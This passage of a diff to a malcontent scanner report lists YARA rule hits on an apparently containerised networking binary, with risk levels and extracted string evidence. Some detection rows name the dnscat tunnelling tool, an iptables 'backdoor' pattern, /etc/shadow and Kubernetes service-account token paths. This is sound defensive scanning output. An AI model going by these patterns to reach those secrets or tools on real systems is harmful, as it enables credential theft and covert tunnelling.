[os.(*File).Read](https://github.com/search?q=os.%28%2AFile%29.Read&type=code) | -| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate](https://github.com/search?q=ftruncate&type=code) | -| LOW | [fs/file/write](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-write.yara#file_write) | writes to file | [writeRawFile](https://github.com/search?q=writeRawFile&type=code) | -| LOW | [fs/link/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-create.yara#linkat) | May create hard file links | [linkat](https://github.com/search?q=linkat&type=code) | -| LOW | [fs/link/read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | -| LOW | [fs/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/loopback.yara#loopback) | uses loopback pseudo-device files | [/dev/loop](https://github.com/search?q=%2Fdev%2Floop&type=code) | -| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | -| LOW | [fs/node/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | -| LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | -| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir-create.yara#mkdtemp) | creates temporary directory | [temp dir](https://github.com/search?q=temp+dir&type=code) | -| LOW | [fs/tempfile/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempfile-create.yara#mktemp) | Uses mktemp to create temporary files | [ioutil/tempfile](https://github.com/search?q=ioutil%2Ftempfile&type=code) | -| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | -| LOW | [hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | -| LOW | [kernel/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/acct.yara#acct) | switch process accounting on or off | [radius-acct](https://github.com/search?q=radius-acct&type=code) | -| LOW | [kernel/cpu/info](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/cpu-info.yara#processor_count) | [gets number of processors](https://man7.org/linux/man-pages/man3/get_nprocs.3.html) | [nproc](https://github.com/search?q=nproc&type=code) | -| LOW | [kernel/hostname/get](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/hostname-get.yara#gethostname) | [get computer host 
name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [/proc/sys/kernel/hostname](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostname&type=code) | -| LOW | [kernel/machine_id](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/machine_id.yara#machineid) | Gets a unique machineid for the host | [machineid](https://github.com/search?q=machineid&type=code) | -| LOW | [kernel/netlink](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/netlink.yara#netlink) | communicate with kernel services | [netlink](https://github.com/search?q=netlink&type=code) | -| LOW | [kernel/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [syscall.Uname](https://github.com/search?q=syscall.Uname&type=code)
[uname](https://github.com/search?q=uname&type=code) | -| LOW | [kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | -| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code)
[SetEDNS0](https://github.com/search?q=SetEDNS0&type=code)
[dnsmessage](https://github.com/search?q=dnsmessage&type=code) | -| LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [CNAMEResource](https://github.com/search?q=CNAMEResource&type=code) | -| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | -| LOW | [net/grpc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/grpc.yara#grpc) | Uses the gRPC Remote Procedure Call framework | [gRPC](https://github.com/search?q=gRPC&type=code) | -| LOW | [net/hostname/resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/hostname-resolve.yara#cannot_resolve) | resolve network host name to IP address | [cannot resolve](https://github.com/search?q=cannot+resolve&type=code) | -| LOW | [net/http/accept/encoding](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-accept-encoding.yara#content_type) | [set HTTP response encoding format (example: gzip)](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Accept-Encoding) | [Accept-Encoding](https://github.com/search?q=Accept-Encoding&type=code) | -| LOW | [net/http/auth](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-auth.yara#http_auth) | makes HTTP requests with basic authentication | [WWW-Authenticate](https://github.com/search?q=WWW-Authenticate&type=code)
[Www-Authenticate](https://github.com/search?q=Www-Authenticate&type=code)
[www-authenticate](https://github.com/search?q=www-authenticate&type=code) | -| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code)
[Referer](https://github.com/search?q=Referer&type=code)
[User-Agent](https://github.com/search?q=User-Agent&type=code) | -| LOW | [net/http2](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http2.yara#http2) | Uses the HTTP/2 protocol | [HTTP/2](https://github.com/search?q=HTTP%2F2&type=code) | -| LOW | [net/http_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http_proxy.yara#proxy_auth) | [use HTTP proxy that requires authentication](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Proxy-Authorization) | [Proxy-Authorization](https://github.com/search?q=Proxy-Authorization&type=code) | -| LOW | [net/ip/send/unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | -| LOW | [net/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code)
[syscall.Sendfile](https://github.com/search?q=syscall.Sendfile&type=code) | -| LOW | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | -| LOW | [net/socket/local/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-local-address.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | -| LOW | [net/socket/peer/address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | -| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvfrom](https://github.com/search?q=recvfrom&type=code)
[recvmsg](https://github.com/search?q=recvmsg&type=code) | -| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | -| LOW | [net/udp/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-receive.yara#udp_listen) | Listens for UDP responses | [ReadFromUDP](https://github.com/search?q=ReadFromUDP&type=code)
[listenUDP](https://github.com/search?q=listenUDP&type=code) | -| LOW | [net/udp/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/udp-send.yara#udp_send) | Sends UDP packets | [DialUDP](https://github.com/search?q=DialUDP&type=code)
[WriteMsgUDP](https://github.com/search?q=WriteMsgUDP&type=code) | -| LOW | [net/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url.yara#url_handle) | Handles URL strings | [RequestURI](https://github.com/search?q=RequestURI&type=code) | -| LOW | [process/chdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chdir.yara#chdir_shell) | changes working directory | [cd](https://github.com/search?q=cd&type=code) | -| LOW | [process/groupid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real, effective, and saved group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | -| LOW | [process/groups/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | -| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | -| LOW | [process/namespace/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/namespace-set.yara#setns) | associate thread or process with a namespace | [setns](https://github.com/search?q=setns&type=code) | -| LOW | [process/userid/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | -| LOW | [ref/path/bin/su](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/bin-su.yara#bin_su) | Calls /bin/su | [/bin/su](https://github.com/search?q=%2Fbin%2Fsu&type=code) | -| LOW | 
[ref/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc.yara#etc_path) | path reference within /etc | [/etc/apache/mime.typeshpack](https://github.com/search?q=%2Fetc%2Fapache%2Fmime.typeshpack&type=code)
[/etc/centos-release/etc/debian](https://github.com/search?q=%2Fetc%2Fcentos-release%2Fetc%2Fdebian&type=code)
[/etc/crio/crio.conf.d/](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf.d%2F&type=code)
[/etc/crio/crio.conf/run/containerd/co](https://github.com/search?q=%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fcontainerd%2Fco&type=code)
[/etc/groupmemory.max](https://github.com/search?q=%2Fetc%2Fgroupmemory.max&type=code)
[/etc/hostnamecri](https://github.com/search?q=%2Fetc%2Fhostnamecri&type=code)
[/etc/hostnameusr/lib/os-releaseetc/ce](https://github.com/search?q=%2Fetc%2Fhostnameusr%2Flib%2Fos-releaseetc%2Fce&type=code)
[/etc/hostsrt](https://github.com/search?q=%2Fetc%2Fhostsrt&type=code)
[/etc/httpd/conf/mime.typesid](https://github.com/search?q=%2Fetc%2Fhttpd%2Fconf%2Fmime.typesid&type=code)
[/etc/localtime](https://github.com/search?q=%2Fetc%2Flocaltime&type=code)
[/etc/login.defs/proc/](https://github.com/search?q=%2Fetc%2Flogin.defs%2Fproc%2F&type=code)
[/etc/mime.types](https://github.com/search?q=%2Fetc%2Fmime.types&type=code)
[/etc/mtablowerdir](https://github.com/search?q=%2Fetc%2Fmtablowerdir&type=code)
[/etc/neuvector/certs/internal/ca.cert](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fca.cert&type=code)
[/etc/neuvector/certs/internal/cert.ke](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.ke&type=code)
[/etc/neuvector/certs/internal/cert.pe](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternal%2Fcert.pe&type=code)
[/etc/neuvector/certs/internalcom.dock](https://github.com/search?q=%2Fetc%2Fneuvector%2Fcerts%2Finternalcom.dock&type=code)
[/etc/nsswitch.confinvalid](https://github.com/search?q=%2Fetc%2Fnsswitch.confinvalid&type=code)
[/etc/os-release](https://github.com/search?q=%2Fetc%2Fos-release&type=code)
[/etc/passwd/etc/shadow](https://github.com/search?q=%2Fetc%2Fpasswd%2Fetc%2Fshadow&type=code)
[/etc/pki/ca-trust/extracted/pem/tls-c](https://github.com/search?q=%2Fetc%2Fpki%2Fca-trust%2Fextracted%2Fpem%2Ftls-c&type=code)
[/etc/pki/tls/cacert.peminvalid](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcacert.peminvalid&type=code)
[/etc/pki/tls/certs/ca-bundle.crtx](https://github.com/search?q=%2Fetc%2Fpki%2Ftls%2Fcerts%2Fca-bundle.crtx&type=code)
[/etc/protocolsunknown](https://github.com/search?q=%2Fetc%2Fprotocolsunknown&type=code)
[/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code)
[/etc/services](https://github.com/search?q=%2Fetc%2Fservices&type=code)
[/etc/shellssubmissionsnil](https://github.com/search?q=%2Fetc%2Fshellssubmissionsnil&type=code)
[/etc/ssl/ca-bundle.pemx](https://github.com/search?q=%2Fetc%2Fssl%2Fca-bundle.pemx&type=code)
[/etc/ssl/cert.peminvalid](https://github.com/search?q=%2Fetc%2Fssl%2Fcert.peminvalid&type=code)
[/etc/ssl/certs/ca-certificates.crtadd](https://github.com/search?q=%2Fetc%2Fssl%2Fcerts%2Fca-certificates.crtadd&type=code)
[/etc/subgid](https://github.com/search?q=%2Fetc%2Fsubgid&type=code)
[/etc/subuid](https://github.com/search?q=%2Fetc%2Fsubuid&type=code)
[/etc/sysconfig/clock/](https://github.com/search?q=%2Fetc%2Fsysconfig%2Fclock%2F&type=code)
[/etc/timezone/dev/.udev/db](https://github.com/search?q=%2Fetc%2Ftimezone%2Fdev%2F.udev%2Fdb&type=code)
[/etc/zoneinfoparsing](https://github.com/search?q=%2Fetc%2Fzoneinfoparsing&type=code) | -| LOW | [ref/path/etc/resolv.conf](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/etc-resolv.conf.yara#etc_resolv_conf) | accesses DNS resolver configuration | [/etc/resolv.conf](https://github.com/search?q=%2Fetc%2Fresolv.conf&type=code) | -| LOW | [ref/path/usr/bin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-bin.yara#usr_bin_path) | path reference within /usr/bin | [/usr/bin/calico-nodePROC](https://github.com/search?q=%2Fusr%2Fbin%2Fcalico-nodePROC&type=code)
[/usr/bin/csp-billing-adapterio.kubernetes.container.namecannot](https://github.com/search?q=%2Fusr%2Fbin%2Fcsp-billing-adapterio.kubernetes.container.namecannot&type=code)
[/usr/bin/getconf/usr/bin/timeoutcontext](https://github.com/search?q=%2Fusr%2Fbin%2Fgetconf%2Fusr%2Fbin%2Ftimeoutcontext&type=code)
[/usr/bin/getentduplicated](https://github.com/search?q=%2Fusr%2Fbin%2Fgetentduplicated&type=code)
[/usr/bin/jqsupervisord.WithCancelgrpc.Servershort](https://github.com/search?q=%2Fusr%2Fbin%2Fjqsupervisord.WithCancelgrpc.Servershort&type=code)
[/usr/bin/lsof/usr/bin/curliptables-savegraceful_stop](https://github.com/search?q=%2Fusr%2Fbin%2Flsof%2Fusr%2Fbin%2Fcurliptables-savegraceful_stop&type=code)
[/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOcontent-type/](https://github.com/search?q=%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2F&type=code)
[/usr/bin/supervisordAdd](https://github.com/search?q=%2Fusr%2Fbin%2FsupervisordAdd&type=code)
[/usr/bin/tee/usr/bin/pod/sbin/sysctl/usr/bin/topconfigure.shcontext.TODOc](https://github.com/search?q=%2Fusr%2Fbin%2Ftee%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOc&type=code)
[/usr/bin/topconfigure.shcontext.TODOcontent-type/dev/urandomshort](https://github.com/search?q=%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcontent-type%2Fdev%2Furandomshort&type=code)
[/usr/bin/uname/usr/bin/iconvPROC](https://github.com/search?q=%2Fusr%2Fbin%2Funame%2Fusr%2Fbin%2FiconvPROC&type=code) | -| LOW | [ref/path/usr/sbin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/usr-sbin.yara#usr_sbin_path) | path reference within /usr/sbin | [/usr/sbin/ethtool/usr/local/bin/dpexiting](https://github.com/search?q=%2Fusr%2Fsbin%2Fethtool%2Fusr%2Flocal%2Fbin%2Fdpexiting&type=code) | -| LOW | [ref/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/path/var.yara#var_path) | path reference within /var | [/var//sbinpInfo/rootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.](https://github.com/search?q=%2Fvar%2F%2FsbinpInfo%2FrootSwarmD.2.5D.2.7D.3.1D.3.2D.3.3D.3.4D.3.5D.3.6D.3.&type=code)
[/var/lib/docker/aufs/diffno](https://github.com/search?q=%2Fvar%2Flib%2Fdocker%2Faufs%2Fdiffno&type=code)
[/var/lib/rpm/Packages/lib/apk/db/installedFMON](https://github.com/search?q=%2Fvar%2Flib%2Frpm%2FPackages%2Flib%2Fapk%2Fdb%2FinstalledFMON&type=code)
[/var/nv_debug/pcap/controller](https://github.com/search?q=%2Fvar%2Fnv_debug%2Fpcap%2Fcontroller&type=code)
[/var/nv_debug/profileCannot](https://github.com/search?q=%2Fvar%2Fnv_debug%2FprofileCannot&type=code)
[/var/nv_debug/snapshotNeuVectorPolicyVersionGRP](https://github.com/search?q=%2Fvar%2Fnv_debug%2FsnapshotNeuVectorPolicyVersionGRP&type=code)
[/var/run/cri-dockerd.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcri-dockerd.sockFile&type=code)
[/var/run/crio/crio.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2Fcrio.sockFile&type=code)
[/var/run/docker.sock/var/lib/dpkg/statusFile](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2Fvar%2Flib%2Fdpkg%2FstatusFile&type=code)
[/var/run/dockershim.sock/var/lib/rpm/Packages.dbFMON](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2Fvar%2Flib%2Frpm%2FPackages.dbFMON&type=code)
[/var/run/openvswitch/Error](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2FError&type=code)
[/var/run/openvswitch/db.sockNotify](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2Fdb.sockNotify&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/ca.crtk8s.io.apimachine](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fca.crtk8s.io.apimachine&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/namespaceproto](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Fnamespaceproto&type=code)
[/var/run/secrets/kubernetes.io/serviceaccount/tokenk8s.io.apimachiner](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceaccount%2Ftokenk8s.io.apimachiner&type=code)
[/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | -| LOW | [ref/site/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/site/url.yara#https_url) | contains embedded HTTPS URLs | [https://bugs.centos.org/](https://bugs.centos.org/)
[https://docker.io/](https://docker.io/)
[https://finishedmemLimitplatform](https://finishedmemLimitplatform)
[https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv](https://git.k8s.io/community/contributors/devel/sig-architecture/api-conv)
[https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md](https://github.com/OAI/OpenAPI-Specification/blob/master/versions/2.0.md)
[https://golang.org/pkg/unicode/](https://golang.org/pkg/unicode/)
[https://index.docker.io/json](https://index.docker.io/json)
[https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o](https://kubernetes.default/apis/config.openshift.io/v1/clusteroperators/o)
[https://kubernetes.default/version/openshiftproto](https://kubernetes.default/version/openshiftproto)
[https://kubernetes.default/versionproto](https://kubernetes.default/versionproto)
[https://kubernetes.io/docs/reference/using-api/api-concepts/](https://kubernetes.io/docs/reference/using-api/api-concepts/)
[https://protobuf.dev/reference/go/faq](https://protobuf.dev/reference/go/faq)
[https://registry-1.docker.io/bufio.Scanner](https://registry-1.docker.io/bufio.Scanner)
[https://registry.hub.docker.com/Failed](https://registry.hub.docker.com/Failed)
[https://www.centos.org/](https://www.centos.org/)
[https://www.iana.org/assignments/service-names-port-numbers/service-names](https://www.iana.org/assignments/service-names-port-numbers/service-names) | -| LOW | [ref/words/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/password.yara#password) | references a 'password' | [GetPassword](https://github.com/search?q=GetPassword&type=code)
[PasswordEprotobuf](https://github.com/search?q=PasswordEprotobuf&type=code)
[UserPassword](https://github.com/search?q=UserPassword&type=code)
[d for field Passwordruntime](https://github.com/search?q=d+for+field+Passwordruntime&type=code)
[no passwords used](https://github.com/search?q=no+passwords+used&type=code)
[passwordSet](https://github.com/search?q=passwordSet&type=code)
[socksUsernamePassword](https://github.com/search?q=socksUsernamePassword&type=code)
[stripPassword](https://github.com/search?q=stripPassword&type=code)
[vpasswordoffsets](https://github.com/search?q=vpasswordoffsets&type=code) | -| LOW | [ref/words/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/ref/words/plugin.yara#plugin) | references a 'plugin' | [PluginPidns](https://github.com/search?q=PluginPidns&type=code)
[Plugincontainerd](https://github.com/search?q=Plugincontainerd&type=code)
[PluginsRequest](https://github.com/search?q=PluginsRequest&type=code)
[PluginsResponseproto](https://github.com/search?q=PluginsResponseproto&type=code)
[Plugins_Handler](https://github.com/search?q=Plugins_Handler&type=code)
[Pluginscontainerd](https://github.com/search?q=Pluginscontainerd&type=code)
[Pluginsproto](https://github.com/search?q=Pluginsproto&type=code)
[adaptPlugin](https://github.com/search?q=adaptPlugin&type=code)
[getPlugins](https://github.com/search?q=getPlugins&type=code)
[pluginCache](https://github.com/search?q=pluginCache&type=code)
[pluginpath](https://github.com/search?q=pluginpath&type=code)
[pluginsFA](https://github.com/search?q=pluginsFA&type=code)
[pluginsToPB](https://github.com/search?q=pluginsToPB&type=code)
[s plugingithub](https://github.com/search?q=s+plugingithub&type=code)
[vplugin](https://github.com/search?q=vplugin&type=code)
[wplugin](https://github.com/search?q=wplugin&type=code) | -| LOW | [secrets/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/secrets/private_key.yara#private_key_val) | References private keys | [privateKey](https://github.com/search?q=privateKey&type=code) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|--------|------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| MEDIUM | [3P/threat_hunting/dnscat](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#dnscat_offensive_tool_keyword) | [references 'dnscat' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [dnscat](https://github.com/search?q=dnscat&type=code) | +| MEDIUM | [3P/threat_hunting/tcpdump](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#tcpdump_greyware_tool_keyword) | 
[references 'tcpdump' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [tcpdump](https://github.com/search?q=tcpdump&type=code) | +| MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | +| MEDIUM | [combo/backdoor/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/backdoor/iptables.yara#iptables_upload_http) | uploads, uses iptables and HTTP | [HTTP](https://github.com/search?q=HTTP&type=code)
[iptables -](https://github.com/search?q=iptables+-&type=code)
[iptables-savegraceful](https://github.com/search?q=iptables-savegraceful&type=code)
[iptablessent](https://github.com/search?q=iptablessent&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | +| MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | +| MEDIUM | [combo/net/tunnel_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code) | +| MEDIUM | [data/embedded/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-zstd.yara#embedded_zstd) | [Contains compressed content in ZStandard format](https://github.com/facebook/zstd) | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code) | +| MEDIUM | [databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | +| MEDIUM | [databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | +| MEDIUM | [databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | +| MEDIUM | [evasion/content/length/0](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 